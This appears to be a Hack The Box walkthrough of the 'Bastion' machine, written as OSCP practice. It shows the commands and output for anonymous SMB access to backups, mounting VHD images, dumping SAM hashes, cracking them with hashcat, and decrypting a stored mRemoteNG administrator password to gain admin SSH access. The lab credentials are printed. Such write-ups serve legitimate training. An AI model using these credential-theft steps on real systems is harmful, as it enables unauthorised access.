In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Sun Oct 22 08:26:55 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/bastion/results/10.10.10.134/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/bastion/results/10.10.10.134/scans/xml/_quick_tcp_nmap.xml 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-22 08:27:02 EDT for 33s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-10-22T14:27:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26941/tcp): CLEAN (Couldn't connect)
| Check 2 (port 37729/tcp): CLEAN (Couldn't connect)
| Check 3 (port 18741/udp): CLEAN (Failed to receive data)
| Check 4 (port 49057/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb2-time:
| date: 2023-10-22T12:27:24
|_ start_date: 2023-10-22T12:25:36
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 22 08:27:35 2023 -- 1 IP address (1 host up) scanned in 39.86 seconds
using crackmapexec – windows server 2016
╭─kali@kali ~/HTB/bastion
╰─$ crackmapexec smb 10.10.10.134 -u '' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [-] Bastion\: STATUS_ACCESS_DENIED
SMB 10.10.10.134 445 BASTION [-] Error enumerating shares: Error occurs while reading from remote(104)
╭─kali@kali ~/HTB/bastion
╰─$
the smb enumeration shows from the autrecon script shows
╭─kali@kali ~/HTB/bastion
╰─$ crackmapexec smb 10.10.10.134 -u '' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [-] Bastion\: STATUS_ACCESS_DENIED
SMB 10.10.10.134 445 BASTION [-] Error enumerating shares: Error occurs while reading from remote(104)
╭─kali@kali ~/HTB/bastion
╰─$
We are able to connect and we download the files in there
╰─$ smbclient \\\\10.10.10.134\\Backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Oct 22 08:29:01 2023
.. D 0 Sun Oct 22 08:29:01 2023
nmap-test-file A 260 Sun Oct 22 08:29:02 2023
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
SUGEJFBQIP.txt A 0 Sun Oct 22 08:28:03 2023
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
WUMPBZIALJ.txt A 0 Sun Oct 22 08:27:47 2023
5638911 blocks of size 4096. 1178191 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get SDT65CB.tmp
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> get WUMPBZIALJ.txt
getting file \WUMPBZIALJ.txt of size 0 as WUMPBZIALJ.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
going through and see some VHD files which are windows image backuops, well try and mount these so we can go through them
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
cd
5638911 blocks of size 4096. 1178057 blocks available
smb: \> cd WindowsImageBackup
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
cd
5638911 blocks of size 4096. 1178057 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1178057 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:02 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:44:03 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
mounted the directory to the kali
╭─kali@kali ~/HTB/bastion/mnt
╰─$ sudo mount -t cifs -o username=guest,password=,vers=1.0 //10.10.10.134/Backups/ ~/HTB/bastion/mnt 32 ↵
╭─kali@kali ~/HTB/bastion/mnt
╰─$ ls
╭─kali@kali ~/HTB/bastion/mnt
╰─$ cd ../
╭─kali@kali ~/HTB/bastion
╰─$ cd mnt
╭─kali@kali ~/HTB/bastion/mnt
╰─$ ls
note.txt SDT65CB.tmp WindowsImageBackup
╭─kali@kali ~/HTB/bastion/mnt
Mounting the Vhd after researching online how to do it
╭─kali@kali ~/HTB/bastion/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
╰─$ guestfish --ro -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd run : list-filesystems
/dev/sda1: ntfs
and
╭─kali@kali ~/HTB/bastion/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 guestmount -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 --ro /home/kali/HTB/bastion/mount/vhd_mount
╭─kali@kali ~/HTB/bastion/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
╰─$
this is mounted
╭─kali@kali ~/HTB/bastion/mount
╰─$ cd vhd_mount
╭─kali@kali ~/HTB/bastion/mount/vhd_mount
╰─$ ls
Boot bootmgr BOOTSECT.BAK 'System Volume Information'
╭─kali@kali ~/HTB/bastion/mount/vhd_mount
╰─$
mounted as below
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2
╰─$ ls
'$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2
╰─$
looking at copying and geting hashes from SAM
╰─$ ls
BCD-Template DEFAULT SECURITY.LOG2
BCD-Template.LOG DEFAULT.LOG SOFTWARE
COMPONENTS DEFAULT.LOG1 SOFTWARE.LOG
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms DEFAULT.LOG2 SOFTWARE.LOG1
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms Journal SOFTWARE.LOG2
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms RegBack SYSTEM
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf SAM SYSTEM.LOG
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf SAM.LOG SYSTEM.LOG1
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms SAM.LOG1 SYSTEM.LOG2
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms SAM.LOG2 systemprofile
COMPONENTS.LOG SECURITY TxR
COMPONENTS.LOG1 SECURITY.LOG
COMPONENTS.LOG2 SECURITY.LOG1
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
copy both SAM and system
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$ ls
BCD-Template DEFAULT SECURITY.LOG2
BCD-Template.LOG DEFAULT.LOG SOFTWARE
COMPONENTS DEFAULT.LOG1 SOFTWARE.LOG
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms DEFAULT.LOG2 SOFTWARE.LOG1
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms Journal SOFTWARE.LOG2
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms RegBack SYSTEM
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf SAM SYSTEM.LOG
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf SAM.LOG SYSTEM.LOG1
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms SAM.LOG1 SYSTEM.LOG2
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms SAM.LOG2 systemprofile
COMPONENTS.LOG SECURITY TxR
COMPONENTS.LOG1 SECURITY.LOG
COMPONENTS.LOG2 SECURITY.LOG1
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$ cp SAM /home/kali/HTB/bastion
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$ cp SYSTEM /home/kali/HTB/bastion
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$
dump the hashes
╭─kali@kali ~/HTB/bastion
╰─$ samdump2 SYSTEM SAM -o sam.txt 255 ↵
╭─kali@kali ~/HTB/bastion
╰─$ cat sam.txt
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
╭─kali@kali ~/HTB/bastion
╰─$
Using hashcat to crack the password
╭─kali@kali /usr/bin
╰─$ ./hashcat -m 1000 ~/HTB/bastion/hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Mon Oct 23 06:59:06 2023 (12 secs)
Time.Estimated...: Mon Oct 23 06:59:18 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1075.3 kH/s (0.23ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9394176/14344385 (65.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: burlfish85 -> burbank105
Hardware.Mon.#1..: Util: 41%
Started: Mon Oct 23 06:59:01 2023
Stopped: Mon Oct 23 06:59:19 2023
╭─kali@kali /usr/bin
Username/password – L4mpje / bureaulampje
Logging in with ssh we are able to get in
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
systeminfo
l4mpje@BASTION C:\Program Files>systeminfo
ERROR: Access denied
l4mpje@BASTION C:\Program Files>
whoami
l4mpje@BASTION C:\Users\L4mpje>whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
bastion\l4mpje S-1-5-21-2146344083-2443430429-1430880910-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Got nothing from running WinPEAS
looking at files
Directory of C:\Program Files
31-01-2022 18:39 <DIR> .
31-01-2022 18:39 <DIR> ..
16-04-2019 12:18 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
22-02-2019 15:19 <DIR> OpenSSH-Win64
22-02-2019 15:08 <DIR> PackageManagement
31-01-2022 18:39 <DIR> VMware
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
22-02-2019 15:08 <DIR> WindowsPowerShell
0 File(s) 0 bytes
15 Dir(s) 4.820.283.392 bytes free
l4mpje@BASTION C:\Program Files>cd ../
l4mpje@BASTION C:\>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\
16-04-2019 12:02 <DIR> Backups
12-09-2016 13:35 <DIR> Logs
22-02-2019 15:42 <DIR> PerfLogs
31-01-2022 18:39 <DIR> Program Files
22-02-2019 15:01 <DIR> Program Files (x86)
23-10-2023 13:20 <DIR> temp
22-02-2019 14:50 <DIR> Users
31-01-2022 18:52 <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 4.820.283.392 bytes free
l4mpje@BASTION C:\>cd
C:\
l4mpje@BASTION C:\>cd "Program Files (x86)"
l4mpje@BASTION C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Program Files (x86)
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
16-07-2016 15:23 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
16-07-2016 15:23 <DIR> Microsoft.NET
22-02-2019 15:01 <DIR> mRemoteNG
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
16-07-2016 15:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 4.820.283.392 bytes free
l4mpje@BASTION C:\Program Files (x86)>cd mRemoteNG
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Program Files (x86)\mRemoteNG
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
18-10-2018 23:31 36.208 ADTree.dll
18-10-2018 23:31 346.992 AxInterop.MSTSCLib.dll
18-10-2018 23:31 83.824 AxInterop.WFICALib.dll
18-10-2018 23:31 2.243.440 BouncyCastle.Crypto.dll
18-10-2018 23:30 71.022 Changelog.txt
18-10-2018 23:30 3.224 Credits.txt
22-02-2019 15:01 <DIR> cs-CZ
22-02-2019 15:01 <DIR> de
22-02-2019 15:01 <DIR> el
22-02-2019 15:01 <DIR> en-US
22-02-2019 15:01 <DIR> es
22-02-2019 15:01 <DIR> es-AR
22-02-2019 15:01 <DIR> Firefox
22-02-2019 15:01 <DIR> fr
18-10-2018 23:31 1.966.960 Geckofx-Core.dll
05-07-2017 01:31 4.482.560 Geckofx-Core.pdb
18-10-2018 23:31 143.728 Geckofx-Winforms.dll
05-07-2017 01:31 259.584 Geckofx-Winforms.pdb
22-02-2019 15:01 <DIR> Help
22-02-2019 15:01 <DIR> hu
22-02-2019 15:01 <DIR> Icons
18-10-2018 23:31 607.088 Interop.MSTSCLib.dll
18-10-2018 23:31 131.440 Interop.WFICALib.dll
22-02-2019 15:01 <DIR> it
22-02-2019 15:01 <DIR> ja-JP
22-02-2019 15:01 <DIR> ko-KR
07-10-2018 13:21 18.326 License.txt
18-10-2018 23:31 283.504 log4net.dll
18-10-2018 23:31 412.528 MagicLibrary.dll
18-10-2018 23:31 1.552.240 mRemoteNG.exe
07-10-2018 13:21 28.317 mRemoteNG.exe.config
18-10-2018 23:30 2.405.888 mRemoteNG.pdb
22-02-2019 15:01 <DIR> nb-NO
22-02-2019 15:01 <DIR> nl
18-10-2018 23:31 451.952 ObjectListView.dll
22-02-2019 15:01 <DIR> pl
22-02-2019 15:01 <DIR> pt
22-02-2019 15:01 <DIR> pt-BR
07-10-2018 13:21 707.952 PuTTYNG.exe
07-10-2018 13:21 887 Readme.txt
18-10-2018 23:31 415.088 Renci.SshNet.dll
22-02-2019 15:01 <DIR> ru
22-02-2019 15:01 <DIR> Schemas
22-02-2019 15:01 <DIR> Themes
22-02-2019 15:01 <DIR> tr-TR
22-02-2019 15:01 <DIR> uk
18-10-2018 23:31 152.432 VncSharp.dll
18-10-2018 23:31 312.176 WeifenLuo.WinFormsUI.Docking.dll
18-10-2018 23:31 55.152 WeifenLuo.WinFormsUI.Docking.ThemeVS2003.dll
18-10-2018 23:31 168.816 WeifenLuo.WinFormsUI.Docking.ThemeVS2012.dll
18-10-2018 23:31 217.968 WeifenLuo.WinFormsUI.Docking.ThemeVS2013.dll
18-10-2018 23:31 243.056 WeifenLuo.WinFormsUI.Docking.ThemeVS2015.dll
22-02-2019 15:01 <DIR> zh-CN
22-02-2019 15:01 <DIR> zh-TW
28 File(s) 17.802.352 bytes
28 Dir(s) 4.820.283.392 bytes free
Investigating mRemoteNG
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>type readme.txt
mRemoteNG is the next generation of mRemote, a full-featured, multi-tab remote connections manager.
It allows you to store all your remote connections in a simple yet powerful interface.
Currently these protocols are supported:
* RDP (Remote Desktop)
* VNC (Virtual Network Computing)
* ICA (Independent Computing Architecture)
* SSH (Secure Shell)
* Telnet (TELecommunication NETwork)
* HTTP/S (Hypertext Transfer Protocol)
* Rlogin (Rlogin)
* RAW
mRemoteNG can be installed on Windows 7 or later.
Windows 7 systems require RDP version 8:
https://support.microsoft.com/en-us/kb/2592687
OR
https://support.microsoft.com/en-us/kb/2923545
Windows 8+ support RDP version 8+ out of the box.
RDP versions are backwards compatible, so an mRemoteNG client running on Windows 10 can connection successfully to a Windows 200
3 host (for example).
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>
checking the changelog
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>type Changelog.txt
1.76.11 (2018-10-18):
Fixes:
------
#1139: Feature "Reconnect to previously opened sessions" not working
#1136: Putty window not maximized
Got this article about getting and decrypting password — https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>type confCons.xml
The system cannot find the file specified.
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>cd mRemoteNG
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GC
M" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0
oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeo
ut="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" Disp
layThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" R
edirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" Redire
ctKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEn
The password is encoded as Password=”aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==”
The script is found –>https://raw.githubusercontent.com/kmahyyg/mremoteng-decrypt/master/mremoteng_decrypt.py
Usage as below
╰─$ python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== 130 ↵
Password: thXLHM96BeKL0ER2
╭─kali@kali ~/HTB/bastion
╰─$
logging in with ssh
╰─$ ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>